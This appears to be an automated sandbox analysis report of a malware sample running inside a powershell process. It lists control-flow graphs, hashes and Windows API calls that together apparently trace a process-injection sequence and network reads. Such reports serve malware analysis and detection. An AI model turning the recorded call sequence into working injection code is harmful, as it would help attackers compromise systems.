                                                                • Opcode ID: b5319c0b2871b31dcc677a2d904e05201f39ad3c2e6fe190a5c25db020a32d48
                                                                • Instruction ID: 0c58039f4fe8f7aa27689fc7204a3c4c4609426adfcea555f7cd141b26804c17
                                                                • Opcode Fuzzy Hash: b5319c0b2871b31dcc677a2d904e05201f39ad3c2e6fe190a5c25db020a32d48
                                                                • Instruction Fuzzy Hash: 10F18C31B042619FDB2A8F78E81077ABBE5AFD1310F2580BAD445DB242DB71DD89CB61

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 244 261724-2659bb 246 2659d2-2659e0 244->246 247 2659bd-2659cf 244->247 248 2659f7-265a33 246->248 249 2659e2-2659f4 246->249 247->246 250 265a47-265b22 CreateProcessW 248->250 251 265a35-265a44 248->251 249->248 255 265b24-265b2a 250->255 256 265b2b-265bf4 250->256 251->250 255->256 265 265bf6-265c1f 256->265 266 265c2a-265c35 256->266 265->266 270 265c36 266->270 270->270
                                                                APIs
                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00265B0F
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 66f7458f1deac77b2e531729a052692bb7f41bb5b8d28361af1afec5b2e3c8c7
                                                                • Instruction ID: 3b92f8bde02ea03947543eae6f22f7b63572246fcecef827dbdaf5a674633ee5
                                                                • Opcode Fuzzy Hash: 66f7458f1deac77b2e531729a052692bb7f41bb5b8d28361af1afec5b2e3c8c7
                                                                • Instruction Fuzzy Hash: 6D81CF75D0026D9FDF25CFA5C880BEDBBB1AF49304F0090AAE548B7250DB749A99CF94

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 271 26592f-2659bb 272 2659d2-2659e0 271->272 273 2659bd-2659cf 271->273 274 2659f7-265a33 272->274 275 2659e2-2659f4 272->275 273->272 276 265a47-265b22 CreateProcessW 274->276 277 265a35-265a44 274->277 275->274 281 265b24-265b2a 276->281 282 265b2b-265bf4 276->282 277->276 281->282 291 265bf6-265c1f 282->291 292 265c2a-265c35 282->292 291->292 296 265c36 292->296 296->296
                                                                APIs
                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00265B0F
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 2c664e8c9aad6259b4db8c79292b65f6b1d2dba16d43be68d40bb107c74bfb20
                                                                • Instruction ID: a72a5b406f66140daacac1c7f6e951566687684c961adc0c82540bd2c5247358
                                                                • Opcode Fuzzy Hash: 2c664e8c9aad6259b4db8c79292b65f6b1d2dba16d43be68d40bb107c74bfb20
                                                                • Instruction Fuzzy Hash: A281D074D0026D9FDF25CFA5C880BEDBBB1AF49304F0091AAE548B7250DB749A99CF54

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 297 265f91-265fff 299 266016-266076 WriteProcessMemory 297->299 300 266001-266013 297->300 301 26607f-2660bd 299->301 302 266078-26607e 299->302 300->299 302->301
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00266066
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 952bc4c17b08ded94d081042dea2ba3c0ec606b1a7c4d6d0bae67df45c78ab94
                                                                • Instruction ID: 406049d627890c4c94edc9724b29e879942773679d40ed4190a9e71b9f505b5f
                                                                • Opcode Fuzzy Hash: 952bc4c17b08ded94d081042dea2ba3c0ec606b1a7c4d6d0bae67df45c78ab94
                                                                • Instruction Fuzzy Hash: EB4189B5D102589FCF10CFA9D984ADEFBF1BB49310F24902AE818BB210D375AA55CF64

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 305 26176c-265fff 307 266016-266076 WriteProcessMemory 305->307 308 266001-266013 305->308 309 26607f-2660bd 307->309 310 266078-26607e 307->310 308->307 310->309
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00266066
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 12d47a1d82444d9d52b8bee0c6ac31db2de8f03fff75a2070c2cff07287a45e6
                                                                • Instruction ID: fc2859e8d8033a168388e897316df917b5c894537f85f7788a26e3bc488c3a47
                                                                • Opcode Fuzzy Hash: 12d47a1d82444d9d52b8bee0c6ac31db2de8f03fff75a2070c2cff07287a45e6
                                                                • Instruction Fuzzy Hash: AC41A8B5D102589FCF00CFA9D984AEEFBF1BB49310F24902AE818B7210D375AA55CB64

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 329 265c61-265cc4 330 265cc6-265cd8 329->330 331 265cdb-265d22 Wow64SetThreadContext 329->331 330->331 332 265d24-265d2a 331->332 333 265d2b-265d63 331->333 332->333
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00265D12
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: dcc94af9359913b9fba7ffa395452006d9b97296f71dff8e7b7704cd0865f5a1
                                                                • Instruction ID: 13b74c8933fed61f0a1309a609bb21abc98e418f062465edcc4aa2585f4686f1
                                                                • Opcode Fuzzy Hash: dcc94af9359913b9fba7ffa395452006d9b97296f71dff8e7b7704cd0865f5a1
                                                                • Instruction Fuzzy Hash: B231ABB5D112589FCB10CFA9D984ADEFBF1AB49314F24802AE415B7350D3789A89CF54

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 313 261730-265cc4 315 265cc6-265cd8 313->315 316 265cdb-265d22 Wow64SetThreadContext 313->316 315->316 317 265d24-265d2a 316->317 318 265d2b-265d63 316->318 317->318
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00265D12
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: de4c2d40037e03fad211718e17f16cfa38ddcdb7ec1a5326a02781568d1554f3
                                                                • Instruction ID: 743c54390322ce1bf81ed35e30ac9d0a22a95dba0a991525a44759077069c346
                                                                • Opcode Fuzzy Hash: de4c2d40037e03fad211718e17f16cfa38ddcdb7ec1a5326a02781568d1554f3
                                                                • Instruction Fuzzy Hash: E931ABB5D112589FCB10CFAAD584ADEFBF1AB49314F24802AE414B7350D374AA45CF64

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 321 261778-265cc4 323 265cc6-265cd8 321->323 324 265cdb-265d22 Wow64SetThreadContext 321->324 323->324 325 265d24-265d2a 324->325 326 265d2b-265d63 324->326 325->326
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00265D12
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 14433aedecb5f4ba2af4791b22655247f610acb50ca8fdf47138a88e5e6cee79
                                                                • Instruction ID: ca2d5e463b806920c77f33b97cd3311366bce2b655696ff3530ad340ff096848
                                                                • Opcode Fuzzy Hash: 14433aedecb5f4ba2af4791b22655247f610acb50ca8fdf47138a88e5e6cee79
                                                                • Instruction Fuzzy Hash: B631ABB5D112589FCB10CFAAD584ADEFBF1AB49314F24802AE419B7350D374AA45CF64

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 336 2660d0-26615e ResumeThread 338 266167-266195 336->338 339 266160-266166 336->339 339->338
                                                                APIs
                                                                • ResumeThread.KERNELBASE(?), ref: 0026614E
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 48c385a8ba6fb6a333568ba1a729253a7623e3639ee830018c7adec5c2f7831f
                                                                • Instruction ID: 5154484b3e64735d7bb30c0190f375830904d29e287f50c408301f48a0e9e8ac
                                                                • Opcode Fuzzy Hash: 48c385a8ba6fb6a333568ba1a729253a7623e3639ee830018c7adec5c2f7831f
                                                                • Instruction Fuzzy Hash: D721ACB5D042489FCF10CFA9D584ADEFBF4AB4A310F24905AE818B7311D375A945CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 342 261790-26615e ResumeThread 344 266167-266195 342->344 345 266160-266166 342->345 345->344
                                                                APIs
                                                                • ResumeThread.KERNELBASE(?), ref: 0026614E
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463352192.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_260000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 6d4c761cf7ae7b0fe7486c7c36c6a09cd4bd49438608ed91ab3257d5bc2fb16d
                                                                • Instruction ID: f990c3abc6312ab10f148e82ca02692e064fed608faf6f78810f50a49c604bd6
                                                                • Opcode Fuzzy Hash: 6d4c761cf7ae7b0fe7486c7c36c6a09cd4bd49438608ed91ab3257d5bc2fb16d
                                                                • Instruction Fuzzy Hash: C921AAB8D142189FCB10CFA9D484ADEFBF4EB49310F20906AE818B7350D375A945CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 681 321730-321733 682 321735-321737 681->682 683 321739-321741 681->683 682->683 684 321743-321748 683->684 685 321759-32175d 683->685 688 321749 684->688 689 32174d-321757 684->689 686 321763-321765 685->686 687 32188e-321898 685->687 690 321767-321773 686->690 691 321775 686->691 692 3218a6-3218ac 687->692 693 32189a-3218a3 687->693 688->689 694 32174b 688->694 689->685 696 321777-321779 690->696 691->696 697 3218b2-3218be 692->697 698 3218ae-3218b0 692->698 694->685 696->687 699 32177f-321783 696->699 700 3218c0-3218df 697->700 698->700 701 321796 699->701 702 321785-321794 699->702 704 321798-32179a 701->704 702->704 704->687 706 3217a0-3217a2 704->706 707 3217b2 706->707 708 3217a4-3217b0 706->708 710 3217b4-3217b6 707->710 708->710 710->687 711 3217bc-3217be 710->711 712 3217c0-3217c6 711->712 713 3217d8-3217e3 711->713 714 3217ca-3217d6 712->714 715 3217c8 712->715 716 3217f2-3217fe 713->716 717 3217e5-3217e8 713->717 714->713 715->713 718 321800-321802 716->718 719 32180c-321813 716->719 717->716 718->719 721 32181a-32181c 719->721 722 321834-32188b 721->722 723 32181e-321824 721->723 725 321826 723->725 726 321828-32182a 723->726 725->722 726->722
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463600035.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_320000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cea825c968cee71e12413ad2e9f04580f6aab31d9cd3d3b7456c9dca38ba0ba6
                                                                • Instruction ID: ca6a755122e9be70fe93a4e17a4c25a1043afb784523efdb5c4b21a43d7c7262
                                                                • Opcode Fuzzy Hash: cea825c968cee71e12413ad2e9f04580f6aab31d9cd3d3b7456c9dca38ba0ba6
                                                                • Instruction Fuzzy Hash: C9414636700220DBCB2B4E28F6406BAB3E5AFF1320B7A80BAD8558B241DB71CD41CB51
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463600035.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_320000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4dd8b4bca6512daae80ed0bf40787fcb32c48dd37572175489898a89eb2cca29
                                                                • Instruction ID: 07fcbc9e2bd0c808e7959f5b2ebbce5f12fe080a2cb763014836d57bcd7eef70
                                                                • Opcode Fuzzy Hash: 4dd8b4bca6512daae80ed0bf40787fcb32c48dd37572175489898a89eb2cca29
                                                                • Instruction Fuzzy Hash: 4411E431600614CFCB59DE64E44076AB7E9AF84320F278466D418D7252D730DDC8CB91
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463237342.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_19d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 207c8af6479efa61661dfcfa8150e0d903162af8f0469100690007294260a9e2
                                                                • Instruction ID: 67ff04f6e36461198e3efc9d4661201973b6acae4ccc2ed456c83b9230f07706
                                                                • Opcode Fuzzy Hash: 207c8af6479efa61661dfcfa8150e0d903162af8f0469100690007294260a9e2
                                                                • Instruction Fuzzy Hash: 1701A771504340AAEB104E15DCC4B67FB98DF81724F5C8559FC490B182C37A9945CAB5
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463237342.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_19d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99143810eb0d29c5a00ed92275416c938cb8e8f42596efb2973a22551b7906af
                                                                • Instruction ID: 3ad976ca85650f39f1a40ebbe9df22cd80fda07868bc3934c2d4a1d367a8fa47
                                                                • Opcode Fuzzy Hash: 99143810eb0d29c5a00ed92275416c938cb8e8f42596efb2973a22551b7906af
                                                                • Instruction Fuzzy Hash: 17F06D71508244AFEB208E16DCC4B66FBA8EB91724F18C55AED4C4A286C37A9D45CAB1
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463600035.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_320000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93bbc0e0a91b75166002d70ca1d2c42c58fa8ef2466ec605e3c5758b2a9fd262
                                                                • Instruction ID: a1ea1b98247b26623ad7dfc6733f99a7cd120124f453242b8fc867e6a1212642
                                                                • Opcode Fuzzy Hash: 93bbc0e0a91b75166002d70ca1d2c42c58fa8ef2466ec605e3c5758b2a9fd262
                                                                • Instruction Fuzzy Hash: 96E0D835B042548EDF166660A5313AD77616FF2211F6181F6C85197646DB308916C752
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463600035.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_320000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (:0$(:0$(:0$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:0$L:0$L:0
                                                                • API String ID: 0-2398128501
                                                                • Opcode ID: ceca3d275fa326b1b1e60f504a6858afbc3305b20a96abdc0bea5e916582e490
                                                                • Instruction ID: 6f43e5ee748d1aa9431203cb44635b7210ea583a397abb9f6ade6975f4832177
                                                                • Opcode Fuzzy Hash: ceca3d275fa326b1b1e60f504a6858afbc3305b20a96abdc0bea5e916582e490
                                                                • Instruction Fuzzy Hash: 35D15835700264DFDF1A9F64E814B7E77A6AF81310F15C06AEA059B293CB70DD88CBA1

                                                                Execution Graph

                                                                Execution Coverage:6%
                                                                Dynamic/Decrypted Code Coverage:19.3%
                                                                Signature Coverage:3.9%
                                                                Total number of Nodes:1542
                                                                Total number of Limit Nodes:43
                                                                execution_graph 53102 415d41 53117 41b411 53102->53117 53104 415d4a 53128 4020f6 53104->53128 53109 4170c4 53152 401e8d 53109->53152 53113 401fd8 11 API calls 53114 4170d9 53113->53114 53115 401fd8 11 API calls 53114->53115 53116 4170e5 53115->53116 53158 4020df 53117->53158 53122 41b456 InternetReadFile 53127 41b479 53122->53127 53123 41b4a6 InternetCloseHandle InternetCloseHandle 53125 41b4b8 53123->53125 53125->53104 53126 401fd8 11 API calls 53126->53127 53127->53122 53127->53123 53127->53126 53169 4020b7 53127->53169 53129 40210c 53128->53129 53130 4023ce 11 API calls 53129->53130 53131 402126 53130->53131 53132 402569 28 API calls 53131->53132 53133 402134 53132->53133 53134 404aa1 53133->53134 53135 404ab4 53134->53135 53236 40520c 53135->53236 53137 404ac9 ctype 53138 404b40 WaitForSingleObject 53137->53138 53139 404b20 53137->53139 53141 404b56 53138->53141 53140 404b32 send 53139->53140 53143 404b7b 53140->53143 53242 4210cb 54 API calls 53141->53242 53145 401fd8 11 API calls 53143->53145 53144 404b69 SetEvent 53144->53143 53146 404b83 53145->53146 53147 401fd8 11 API calls 53146->53147 53148 404b8b 53147->53148 53148->53109 53149 401fd8 53148->53149 53150 4023ce 11 API calls 53149->53150 53151 401fe1 53150->53151 53151->53109 53153 402163 53152->53153 53157 40219f 53153->53157 53260 402730 11 API calls 53153->53260 53155 402184 53261 402712 11 API calls std::_Deallocate 53155->53261 53157->53113 53159 4020e7 53158->53159 53175 4023ce 53159->53175 53161 4020f2 53162 43bda0 53161->53162 53167 4461b8 ___crtLCMapStringA 53162->53167 53163 4461f6 53191 44062d 20 API calls __dosmaperr 53163->53191 53164 4461e1 RtlAllocateHeap 53166 41b42f InternetOpenW InternetOpenUrlW 53164->53166 53164->53167 53166->53122 53167->53163 53167->53164 53190 443001 7 API calls 2 library calls 53167->53190 53170 4020bf 53169->53170 53171 4023ce 11 API calls 53170->53171 53172 4020ca 53171->53172 53192 40250a 53172->53192 53174 4020d9 53174->53127 53176 402428 53175->53176 53177 4023d8 53175->53177 53176->53161 53177->53176 53179 4027a7 53177->53179 53180 402e21 53179->53180 53183 4016b4 53180->53183 53182 402e30 53182->53176 53184 4016c6 53183->53184 53185 4016cb 53183->53185 53189 43bd68 11 API calls _abort 53184->53189 53185->53184 53187 4016f3 53185->53187 53187->53182 53188 43bd67 53189->53188 53190->53167 53191->53166 53193 40251a 53192->53193 53194 402520 53193->53194 53195 402535 53193->53195 53199 402569 53194->53199 53209 4028e8 53195->53209 53198 402533 53198->53174 53220 402888 53199->53220 53201 40257d 53202 402592 53201->53202 53203 4025a7 53201->53203 53225 402a34 22 API calls 53202->53225 53205 4028e8 28 API calls 53203->53205 53208 4025a5 53205->53208 53206 40259b 53226 4029da 22 API calls 53206->53226 53208->53198 53210 4028f1 53209->53210 53211 402953 53210->53211 53212 4028fb 53210->53212 53234 4028a4 22 API calls 53211->53234 53215 402904 53212->53215 53216 402917 53212->53216 53228 402cae 53215->53228 53218 402915 53216->53218 53219 4023ce 11 API calls 53216->53219 53218->53198 53219->53218 53221 402890 53220->53221 53222 402898 53221->53222 53227 402ca3 22 API calls 53221->53227 53222->53201 53225->53206 53226->53208 53229 402cb8 __EH_prolog 53228->53229 53235 402e54 22 API calls 53229->53235 53231 4023ce 11 API calls 53233 402d92 53231->53233 53232 402d24 53232->53231 53233->53218 53235->53232 53237 405214 53236->53237 53238 4023ce 11 API calls 53237->53238 53239 40521f 53238->53239 53243 405234 53239->53243 53241 40522e 53241->53137 53242->53144 53244 405240 53243->53244 53245 40526e 53243->53245 53247 4028e8 28 API calls 53244->53247 53259 4028a4 22 API calls 53245->53259 53249 40524a 53247->53249 53249->53241 53260->53155 53261->53157 53262 10006d60 53263 10006d69 53262->53263 53264 10006d72 53262->53264 53266 10006c5f 53263->53266 53286 10005af6 GetLastError 53266->53286 53268 10006c6c 53306 10006d7e 53268->53306 53270 10006c74 53315 100069f3 53270->53315 53273 10006c8b 53273->53264 53276 10006cce 53340 1000571e 19 API calls _free 53276->53340 53280 10006cc9 53339 10006368 19 API calls __dosmaperr 53280->53339 53282 10006d12 53282->53276 53342 100068c9 25 API calls 53282->53342 53283 10006ce6 53283->53282 53341 1000571e 19 API calls _free 53283->53341 53287 10005b12 53286->53287 53288 10005b0c 53286->53288 53292 10005b61 SetLastError 53287->53292 53344 1000637b 19 API calls 2 library calls 53287->53344 53343 10005e08 10 API calls 2 library calls 53288->53343 53291 10005b24 53293 10005b2c 53291->53293 53346 10005e5e 10 API calls 2 library calls 53291->53346 53292->53268 53345 1000571e 19 API calls _free 53293->53345 53295 10005b41 53295->53293 53297 10005b48 53295->53297 53347 1000593c 19 API calls _abort 53297->53347 53298 10005b32 53299 10005b6d SetLastError 53298->53299 53349 100055a8 36 API calls _abort 53299->53349 53301 10005b53 53348 1000571e 19 API calls _free 53301->53348 53305 10005b5a 53305->53292 53305->53299 53307 10006d8a ___scrt_is_nonwritable_in_current_image 53306->53307 53308 10005af6 _abort 36 API calls 53307->53308 53313 10006d94 53308->53313 53310 10006e18 _abort 53310->53270 53313->53310 53350 100055a8 36 API calls _abort 53313->53350 53351 10005671 RtlEnterCriticalSection 53313->53351 53352 1000571e 19 API calls _free 53313->53352 53353 10006e0f RtlLeaveCriticalSection _abort 53313->53353 53354 100054a7 53315->53354 53318 10006a14 GetOEMCP 53321 10006a3d 53318->53321 53319 10006a26 53320 10006a2b GetACP 53319->53320 53319->53321 53320->53321 53321->53273 53322 100056d0 53321->53322 53323 1000570e 53322->53323 53327 100056de _abort 53322->53327 53365 10006368 19 API calls __dosmaperr 53323->53365 53324 100056f9 RtlAllocateHeap 53326 1000570c 53324->53326 53324->53327 53326->53276 53329 10006e20 53326->53329 53327->53323 53327->53324 53364 1000474f 7 API calls 2 library calls 53327->53364 53330 100069f3 38 API calls 53329->53330 53331 10006e3f 53330->53331 53334 10006e90 IsValidCodePage 53331->53334 53336 10006e46 53331->53336 53338 10006eb5 ___scrt_fastfail 53331->53338 53333 10006cc1 53333->53280 53333->53283 53335 10006ea2 GetCPInfo 53334->53335 53334->53336 53335->53336 53335->53338 53376 10002ada 53336->53376 53366 10006acb GetCPInfo 53338->53366 53339->53276 53340->53273 53341->53282 53342->53276 53343->53287 53344->53291 53345->53298 53346->53295 53347->53301 53348->53305 53351->53313 53352->53313 53353->53313 53355 100054c4 53354->53355 53361 100054ba 53354->53361 53356 10005af6 _abort 36 API calls 53355->53356 53355->53361 53357 100054e5 53356->53357 53362 10007a00 36 API calls __fassign 53357->53362 53359 100054fe 53363 10007a2d 36 API calls __fassign 53359->53363 53361->53318 53361->53319 53362->53359 53363->53361 53364->53327 53365->53326 53367 10006b05 53366->53367 53375 10006baf 53366->53375 53383 100086e4 53367->53383 53370 10002ada _ValidateLocalCookies 5 API calls 53372 10006c5b 53370->53372 53372->53336 53374 10008a3e 41 API calls 53374->53375 53375->53370 53377 10002ae3 53376->53377 53378 10002ae5 IsProcessorFeaturePresent 53376->53378 53377->53333 53380 10002b58 53378->53380 53453 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53380->53453 53382 10002c3b 53382->53333 53384 100054a7 __fassign 36 API calls 53383->53384 53385 10008704 MultiByteToWideChar 53384->53385 53387 10008742 53385->53387 53395 100087da 53385->53395 53389 100056d0 20 API calls 53387->53389 53392 10008763 ___scrt_fastfail 53387->53392 53388 10002ada _ValidateLocalCookies 5 API calls 53390 10006b66 53388->53390 53389->53392 53397 10008a3e 53390->53397 53391 100087d4 53402 10008801 19 API calls _free 53391->53402 53392->53391 53394 100087a8 MultiByteToWideChar 53392->53394 53394->53391 53396 100087c4 GetStringTypeW 53394->53396 53395->53388 53396->53391 53398 100054a7 __fassign 36 API calls 53397->53398 53399 10008a51 53398->53399 53403 10008821 53399->53403 53402->53395 53404 1000883c 53403->53404 53405 10008862 MultiByteToWideChar 53404->53405 53406 1000888c 53405->53406 53416 10008a16 53405->53416 53410 100056d0 20 API calls 53406->53410 53412 100088ad 53406->53412 53407 10002ada _ValidateLocalCookies 5 API calls 53408 10006b87 53407->53408 53408->53374 53409 100088f6 MultiByteToWideChar 53411 1000890f 53409->53411 53425 10008962 53409->53425 53410->53412 53430 10005f19 53411->53430 53412->53409 53412->53425 53416->53407 53417 10008971 53419 100056d0 20 API calls 53417->53419 53423 10008992 53417->53423 53418 10008939 53421 10005f19 10 API calls 53418->53421 53418->53425 53419->53423 53420 10008a07 53438 10008801 19 API calls _free 53420->53438 53421->53425 53423->53420 53424 10005f19 10 API calls 53423->53424 53426 100089e6 53424->53426 53439 10008801 19 API calls _free 53425->53439 53426->53420 53427 100089f5 WideCharToMultiByte 53426->53427 53427->53420 53428 10008a35 53427->53428 53440 10008801 19 API calls _free 53428->53440 53441 10005c45 53430->53441 53432 10005f40 53435 10005f49 53432->53435 53445 10005fa1 9 API calls 2 library calls 53432->53445 53434 10005f89 LCMapStringW 53434->53435 53436 10002ada _ValidateLocalCookies 5 API calls 53435->53436 53437 10005f9b 53436->53437 53437->53417 53437->53418 53437->53425 53438->53425 53439->53416 53440->53425 53443 10005c71 53441->53443 53444 10005c75 __crt_fast_encode_pointer 53441->53444 53443->53444 53446 10005ce1 53443->53446 53444->53432 53445->53434 53447 10005d02 LoadLibraryExW 53446->53447 53451 10005cf7 53446->53451 53448 10005d37 53447->53448 53449 10005d1f GetLastError 53447->53449 53448->53451 53452 10005d4e FreeLibrary 53448->53452 53449->53448 53450 10005d2a LoadLibraryExW 53449->53450 53450->53448 53451->53443 53452->53451 53453->53382 53454 434906 53459 434bd8 SetUnhandledExceptionFilter 53454->53459 53456 43490b pre_c_initialization 53460 4455cc 20 API calls 2 library calls 53456->53460 53458 434916 53459->53456 53460->53458 53461 1000c7a7 53462 1000c7be 53461->53462 53469 1000c82c 53461->53469 53462->53469 53471 1000c7e6 GetModuleHandleA 53462->53471 53463 1000c872 53464 1000c835 GetModuleHandleA 53466 1000c83f 53464->53466 53466->53466 53466->53469 53469->53463 53469->53464 53472 1000c7ef 53471->53472 53478 1000c82c 53471->53478 53481 1000c803 53472->53481 53474 1000c872 53475 1000c835 GetModuleHandleA 53476 1000c83f 53475->53476 53476->53476 53476->53478 53478->53474 53478->53475 53482 1000c809 53481->53482 53483 1000c82c 53482->53483 53484 1000c80d VirtualProtect 53482->53484 53486 1000c872 53483->53486 53487 1000c835 GetModuleHandleA 53483->53487 53484->53483 53485 1000c81c VirtualProtect 53484->53485 53485->53483 53488 1000c83f 53487->53488 53488->53483 53489 43bea8 53491 43beb4 _swprintf ___DestructExceptionObject 53489->53491 53490 43bec2 53505 44062d 20 API calls __dosmaperr 53490->53505 53491->53490 53493 43beec 53491->53493 53500 445909 EnterCriticalSection 53493->53500 53495 43bec7 ___DestructExceptionObject __cftoe 53496 43bef7 53501 43bf98 53496->53501 53500->53496 53503 43bfa6 53501->53503 53502 43bf02 53506 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53502->53506 53503->53502 53507 4497ec 37 API calls 2 library calls 53503->53507 53505->53495 53506->53495 53507->53503 53508 4458c8 53509 4458d3 53508->53509 53511 4458fc 53509->53511 53512 4458f8 53509->53512 53514 448b04 53509->53514 53521 445920 DeleteCriticalSection 53511->53521 53522 44854a 53514->53522 53517 448b49 InitializeCriticalSectionAndSpinCount 53520 448b34 53517->53520 53519 448b60 53519->53509 53529 43502b 53520->53529 53521->53512 53523 44857a 53522->53523 53524 448576 53522->53524 53523->53517 53523->53520 53524->53523 53525 44859a 53524->53525 53536 4485e6 